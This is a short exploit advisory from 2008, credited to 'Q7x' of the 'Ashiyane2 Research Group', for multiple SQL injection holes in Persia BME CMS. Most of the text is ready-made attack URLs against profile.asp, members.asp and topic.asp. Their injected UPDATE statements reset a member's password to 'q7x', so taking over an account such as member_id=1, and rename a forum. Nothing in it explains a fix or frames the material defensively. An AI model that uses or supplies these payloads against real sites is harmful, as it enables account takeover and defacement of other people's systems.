Persia BME CMS Multiple Remote Vulnerabilities
#site : www.persiabme.com
#Author :  Q7x
#e-mail : Larestankids[at]yahoo[dot]com
# -== Ashiyane2 Research Group ==- Www.Larestankids.coM
#
#
#UPDATE Members
#member.member_id=MEMBER_ID example member.member_id=1
#Profile.asp Remote Sql Injection
#members.asp Remote Sql Injection

http://www.target.com/path/forums/profile.asp?ucode=1 UPDATE member SET member.pass='q7x' where member.member_id=1--

http://www.target.com/path/register/members.asp?find=' UPDATE member SET member.pass='q7x' where member.member_id=1--&sort=member_id&arrow=desc

#Password : q7x


#Topic.asp Remote Sql Injection
#Update Forum Name

http://www.target.com/path/forums/topic.asp?fid=1 UPDATE forum SET forum.name='q7x' where forum_id=62


Larestankids.coM [2008/01/26]